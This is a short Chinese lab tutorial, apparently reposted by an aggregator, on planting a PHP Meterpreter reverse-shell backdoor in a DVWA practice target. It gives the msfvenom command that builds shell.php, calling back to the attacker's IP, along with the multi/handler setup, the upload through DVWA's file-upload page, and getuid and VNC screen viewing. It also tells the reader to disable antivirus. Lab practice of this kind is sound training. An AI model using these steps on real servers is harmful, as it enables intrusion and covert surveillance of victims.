2
PHP后门反弹演示
source link: https://blog.51cto.com/u_15936127/6007605
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
- 一台kali虚拟机
- 一台 win11物理机
- phpstudy 开启 Nginx和Mysql
- phpstudy中已经搭建好DVWA靶场
- DVWA靶场的安全等级调整值low
需要将杀毒软件个关了, 否则有提示, 黑客入侵.
使用监控模块, 输入:
use exploit/multi/handler
配置payload
set payload php/meterpreter/reverse_tcp
# 接着输入
options
# 接着输入
options
设置 lhost 和lport
这里发现 攻击机的端口不用设置了, 已经有了, 只要设置lhost 就可以了
set lhost 攻击机的ip
生成php后门执行攻击获得meterpreter
注意: 要新建端口, 在root权限下执行
msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机ip lport=4444 R>shell.php
这样在window11左面少就有这个文件了
这是我原来的地址: http://dvwa/vulnerabilities/upload/#
这是我要填写的地址: http://dvwa/hackable/uploads/shell.php
出现上图几面说明: 这是正常的, 后门已经上传到了靶机上
run
# 也可以直接输入 exploit , 都一样
# 也可以直接输入 exploit , 都一样
也可能出现 404, 都是正常现象
只要有这两行, 就代表上传的后门生效了
- 获取管理员的名字, 输入:
getuid
- 观看屏幕 可以在meterpreter里输入
run vnc
点开文件即可看到自己电脑的画面
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK